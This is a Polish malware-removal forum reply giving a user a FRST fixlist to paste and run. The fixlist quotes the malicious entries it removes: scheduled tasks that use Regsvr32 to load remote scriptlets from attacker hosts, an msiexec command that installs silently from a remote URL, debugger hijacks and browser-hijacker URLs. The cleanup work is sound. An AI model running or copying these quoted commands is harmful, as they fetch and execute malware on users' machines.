Odinstaluj Advanced SystemCare 10,AlphaGo,IObit Malware Fighter 4,Java 8 Update 111,YAC(Yet Another Cleaner!).Otwórz notatnik systemowy i wklej: CloseProcesses: Task: {070C2F94-BE21-455A-AAF8-748E0104F4A5} - System32\Tasks\ASC10_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe Task: {33189325-A415-44A2-8156-5156EDC97B7B} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SNWlSN8F8MTQYNjLXOTVXRYFcMTNWNdM1OWk3NjI2OF== scrobj.dll Task: {7B248FC2-DEEE-4904-BAC2-59A0A653AFD8} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-4228095435-3539589198-294085663-1002Core => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-07] (Facebook Inc.) Task: {7E644E38-3E39-4970-BBB6-2C4036CA3120} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SNWlSN8F8MTQYNjLXOTVXRYFcMTNWNdM1OWk3NjI2OF== scrobj.dll Task: {A48001A6-7627-479D-8C0F-06722CB0072F} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-27] (AVAST Software) Task: {AB0FC512-C892-4715-85A6-B49C49D33594} - System32\Tasks\ASC10_SkipUac_KUBA7 => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe Task: {C0B5D6E4-C443-4059-8A0D-1389A40FB899} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-4228095435-3539589198-294085663-1002UA => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-07] (Facebook Inc.) Task: {DF7454D0-6550-483B-9564-D06F0C4A1916} - System32\Tasks\avastBCLRestartS-1-5-21-4228095435-3539589198-294085663-1002 => Chrome.exe Task: {EF072849-329B-4C3A-866E-63B75A737531} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== UWAGA Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-4228095435-3539589198-294085663-1002Core.job => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-4228095435-3539589198-294085663-1002UA.job => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe Shortcut: C:\Users\KUBA7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Bangtony\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bangtony\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bangtony\Application\chrome.exe (Google Inc.) ShortcutWithArgument: C:\Users\KUBA7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\KUBA7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2012-04-04] (Adobe Systems Incorporated) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [6006560 2016-11-01] (IObit) HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\KUBA7\AppData\Local\Temp\DeleteOnReboot.bat [804 2017-05-27] () <===== UWAGA HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\Run: [Facebook Update] => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-10-07] (Facebook Inc.) HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\Run: [Advanced SystemCare 10] => "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe" /Auto HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\Run: [background_fault] => C:\Users\KUBA7\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) <===== UWAGA HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SNWlSN8F8MTQYNjLXOTVXRYFcMTNWNdM1OWk3NjI2OF== /q HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\MountPoints2: {34234e0f-fd3c-11e3-bed5-1867b0863a0f} - "E:\windows\Install\Install.exe" HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\MountPoints2: {44102900-8f1e-11e3-824e-806e6f6e6963} - "D:\Autorun.exe" HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\MountPoints2: {6b8e869e-9029-11e4-bf18-1867b0863a0f} - "E:\LGAutoRun.exe" IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku BootExecute: autocheck autochk * sdnclean64.exe GroupPolicy: Ograniczenia - Chrome <======= UWAGA CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA AutoConfigURL: [S-1-5-21-4228095435-3539589198-294085663-1002] => hxxp://nonblocker.com/wpad.dat?3823b2fda3dca681b95123d74d8e9c0022329109 ManualProxies: 0hxxp://nonblocker.com/wpad.dat?3823b2fda3dca681b95123d74d8e9c0022329109 HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} HKU\S-1-5-21-4228095435-3539589198-294085663-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} HKU\S-1-5-21-4228095435-3539589198-294085663-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC HKU\S-1-5-21-4228095435-3539589198-294085663-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&ts=1422551429&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = hxxp://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&ts=1422551429&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms} SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {60590C88-1622-486E-B747-262962D8010E} URL = hxxp://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&ts=1422551429&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = hxxp://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&ts=1422551429&type=default&q={searchTerms} FF NewTab: Mozilla\Firefox\Profiles\qecomzfd.default-1485029875237 -> hxxp://www.luckysearch123.com?type=hp&ts=1493971999&from=d6440504&uid=st500lt012-9ws142_w0vandjcxxxxw0vandjc&z=8f90f3a68a7782b64328aa9gdzat7cdt6m1gft9t0q FF DefaultSearchEngine: Mozilla\Firefox\Profiles\qecomzfd.default-1485029875237 -> Google (avast) FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\qecomzfd.default-1485029875237 -> luck FF SearchPlugin: C:\Users\KUBA7\AppData\Roaming\Mozilla\Firefox\Profiles\qecomzfd.default-1485029875237\searchplugins\ourluckysites.xml [2017-05-02] FF NewTab: Firefox\Firefox\Profiles\qecomzfd.default-1485029875237 -> hxxp://www.luckysearch123.com?type=hp&ts=1493971999&from=d6440504&uid=st500lt012-9ws142_w0vandjcxxxxw0vandjc&z=8f90f3a68a7782b64328aa9gdzat7cdt6m1gft9t0q FF SearchEngineOrder.1: Firefox\Firefox\Profiles\qecomzfd.default-1485029875237 -> luck FF SearchPlugin: C:\Users\KUBA7\AppData\Roaming\Firefox\Firefox\Profiles\qecomzfd.default-1485029875237\searchplugins\luck.xml [2017-05-05] FF SearchPlugin: C:\Users\KUBA7\AppData\Roaming\Firefox\Firefox\Profiles\qecomzfd.default-1485029875237\searchplugins\ourluckysites.xml [2017-05-02] FF SearchPlugin: C:\Users\KUBA7\AppData\Roaming\Firefox\Firefox\Profiles\qecomzfd.default-1485029875237\searchplugins\startsearch.xml [2017-05-27] FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\195743812.js [2016-12-18] <==== UWAGA (Linkuje do pliku *.cfg) FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\195743812.cfg [2016-12-18] <==== UWAGA CHR HomePage: Default -> hxxp://isearch.omiga-plus.com/?type=hppp&ts=1422551329&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hppp&ts=1422551329&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC" R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101528 2017-05-27] () <==== UWAGA R4 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) S2 terana; C:\Users\KUBA7\AppData\Local\terana\terana.dll [908288 2017-05-26] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 WinSAPSvc; C:\Users\KUBA7\AppData\Roaming\WinSAPSvc\WinSAP.dll [1932800 2017-05-17] () [Brak podpisu cyfrowego] <==== UWAGA U4 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA U4 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA U0 aswVmm; Brak ImagePath S3 AthBTPort; \SystemRoot\system32\DRIVERS\btath_flt.sys [X] S3 BTATH_A2DP; \SystemRoot\system32\drivers\btath_a2dp.sys [X] S3 btath_avdt; \SystemRoot\system32\drivers\btath_avdt.sys [X] S0 BTATH_BUS; System32\drivers\btath_bus.sys [X] S3 BTATH_HCRP; \SystemRoot\System32\drivers\btath_hcrp.sys [X] S3 BTATH_HID; \SystemRoot\system32\DRIVERS\btath_hid.sys [X] S3 BTATH_LWFLT; \SystemRoot\system32\DRIVERS\btath_lwflt.sys [X] S3 BTATH_RCP; \SystemRoot\System32\drivers\btath_rcp.sys [X] S3 BtFilter; \SystemRoot\system32\DRIVERS\btfilter.sys [X] S3 cpuz138; \??\C:\Users\KUBA7\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] <==== UWAGA U2 CSHMDR; Brak ImagePath S3 huawei_enumerator; \SystemRoot\System32\drivers\ew_jubusenum.sys [X] R4 nvvad_WaveExtensible; \SystemRoot\system32\drivers\nvvad64v.sys [X] S3 SBIOSIO; \??\C:\Users\KUBA7\AppData\Local\Temp\__Samsung_Update\SBIOSIO64.sys [X] <==== UWAGA U2 snare; Brak ImagePath 2017-05-27 14:28 - 2017-05-27 14:28 - 00000000 ____D C:\Users\KUBA7\AppData\Roaming\Firefox 2017-05-27 14:28 - 2017-05-27 14:28 - 00000000 ____D C:\Users\KUBA7\AppData\Local\Bangtony 2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Users\Public\Documents\Google 2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Users\KUBA7\AppData\Roaming\WinSAPSvc 2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Users\KUBA7\AppData\Local\background_fault 2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Program Files (x86)\Bangtony 2017-05-27 13:41 - 2017-05-27 13:50 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2017-05-27 13:41 - 2017-05-27 13:41 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking 2017-05-27 13:39 - 2017-05-27 13:40 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\KUBA7\Downloads\spybot-2.4.exe 2017-05-27 13:12 - 2017-05-27 14:22 - 00000000 ____D C:\AdwCleaner 2017-05-03 13:02 - 2017-05-16 17:37 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 C:\Users\KUBA7\AppData\Local\Temp\DeleteOnReboot.bat C:\Users\KUBA7\AppData\Local\background_fault\aswRD.exe EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix/Napraw. Przeskanuj progr. Malwarebytes Anti-Malware http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/